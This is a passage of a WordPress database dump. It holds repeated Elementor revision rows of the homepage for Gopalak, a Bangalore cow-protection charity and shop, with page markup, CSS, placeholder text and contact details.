alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:24','2022-10-12 07:19:24','',1373,'https://gopalak.in/?p=1678',0,'revision','',0),(1679,1,'2022-10-12 12:49:24','2022-10-12 07:19:24','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"100\" height=\"100\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 100px) 100vw, 100px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:24','2022-10-12 07:19:24','',1373,'https://gopalak.in/?p=1679',0,'revision','',0),(1680,1,'2022-10-12 12:49:43','2022-10-12 07:19:43','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"100\" height=\"100\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 100px) 100vw, 100px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:43','2022-10-12 07:19:43','',1373,'https://gopalak.in/?p=1680',0,'revision','',0),(1681,1,'2022-10-12 12:49:43','2022-10-12 07:19:43','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"100\" height=\"100\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 100px) 100vw, 100px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:43','2022-10-12 07:19:43','',1373,'https://gopalak.in/?p=1681',0,'revision','',0),(1682,1,'2022-10-12 12:49:44','2022-10-12 07:19:44','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/logo1211-pw1l8axyrm0vuixq49dusjmg8mk5kn3o880cka986m.png\" title=\"logo1211\" alt=\"logo1211\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:44','2022-10-12 07:19:44','',1373,'https://gopalak.in/?p=1682',0,'revision','',0),(1683,1,'2022-10-12 12:49:58','2022-10-12 07:19:58','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a 